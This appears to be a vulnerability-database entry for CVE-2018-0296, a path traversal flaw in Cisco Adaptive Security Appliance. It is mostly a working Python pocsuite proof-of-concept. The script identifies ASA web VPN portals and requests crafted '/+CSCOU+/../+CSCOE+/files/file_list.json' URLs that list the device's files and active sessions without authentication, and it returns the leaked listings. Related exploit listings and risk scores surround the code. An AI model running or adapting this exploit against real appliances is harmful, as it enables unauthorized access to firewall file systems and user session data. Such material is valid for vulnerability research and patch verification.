Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)

🗓️ 22 Jun 2018 00:00:00Reported by My SeebugType

Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296) vulnerability exploit in Python

Reporter	Title	Published	Views	Family All 52
0day.today	Cisco Adaptive Security Appliance - Path Traversal Exploit	29 Jun 201800:00	–	zdt
0day.today	Cisco Adaptive Security Appliance Path Traversal Exploit	24 Jul 201800:00	–	zdt
0day.today	Cisco Adaptive Security Appliance - Path Traversal Exploit	12 Aug 201900:00	–	zdt
GithubExploit	Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Cisco Ios	22 Jan 201821:15	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software	21 Jun 201815:44	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software	28 Sep 202005:00	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Cisco Adaptive_Security_Appliance_Software	21 Jun 201808:36	–	githubexploit
ATTACKERKB	CVE-2025-20362	25 Sep 202516:12	–	attackerkb
ATTACKERKB	Cisco ASA Directory Traversal	7 Jun 201800:00	–	attackerkb
BDU FSTEC	The vulnerability of the web interface of Cisco Adaptive Security Appliance (ASA) and Configure Firepower Threat Defense (FTD) allows a perpetrator to cause service interruptions or expose sensitive information.	13 Dec 201800:00	–	bdu_fstec


                                                #!/usr/bin/python
# -*- coding: utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import urlparse


class TestPOC(POCBase):
    name = "Cisco Adaptive Security Appliance - Path Traversal"
    vulID = 'CVE-2018-0296'
    author = ['sebao']
    vulType = 'Path Traversal'
    version = '1.0'  # default version: 1.0
    references = ''
    desc = ''


    vulDate = ''
    createDate = '2018-06-22'
    updateDate = '2018-06-22'

    appName = 'Cisco Adaptive'
    appVersion = ''
    dork="/+CSCOE+/logon.html"
    appPowerLink = ''
    samples = []

    def _attack(self):

        return self._verify(self)

    def _verify(self):
        '''verify mode'''
        result = {}
        filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
        CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
        active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
        logon = "/+CSCOE+/logon.html"

        is_cisco_asa = req.get(urlparse.urljoin(self.url, logon), verify=False, allow_redirects=False)

        if "webvpnLang" in is_cisco_asa.cookies:
            filelist_r = req.get(urlparse.urljoin(self.url, filelist_dir), verify=False)
            CSCOE_r = req.get(urlparse.urljoin(self.url, CSCOE_dir), verify=False)
            active_sessions_r = req.get(urlparse.urljoin(self.url, active_sessions), verify=False)

            if str(filelist_r.status_code) == "200" and filelist_r and CSCOE_r:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['filelist'] = filelist_r.text
                result['VerifyInfo']['CSCOE'] = CSCOE_r.text
            return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)

22 Jun 2018 00:00Current

0.9Low risk

Vulners AI Score0.9

EPSS0.99903